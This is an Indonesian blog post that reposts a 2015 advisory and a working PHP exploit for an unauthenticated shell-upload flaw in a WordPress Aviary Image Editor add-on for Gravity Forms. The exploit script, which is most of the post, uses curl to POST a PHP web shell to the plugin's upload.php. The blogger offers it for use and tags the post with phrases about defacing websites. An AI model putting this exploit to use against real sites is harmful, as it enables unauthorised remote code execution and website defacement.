Assalamualaikum,
Kali ini ane mau share Exploit WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability, langsung saja yuk :D
= Author: Larry W. Cashdollar, @_larry0
= Date: 2015-06-07
= Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
= Vendor: Waters Edge Web Design and NetherWorks LLC
= Vendor Notified: 2015-06-08
= Advisory: http://www.vapid.dhs.org/advisory.php?v=125
= Vulnerability in 'upload.php': BLANK Page
=======================================================================
Vulnerability:
There is a remote
file upload vulnerability in
aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an
unauthenticated user can upload any file to the system. Including a
.php file. The upload.php doesn't check that the user is authenticated
and a simple post will allow arbitrary code to be uploaded to the
server.
Exploit Code :
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-
for-gravity-forms/includes/
upload.php';
$file_name_with_full_path = '/var/www/nameshell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'nameshell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
Sekaian dan Terima Kasih,
Wassalamualaikum wr.wb
Cara Deface Dengan Aviary Imaege Editor
Deface Dengan WP Aviary Image Editor
WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability
Previous PostPosting Lama
Beranda
Diberdayakan oleh Blogger.
0 komentar:
Posting Komentar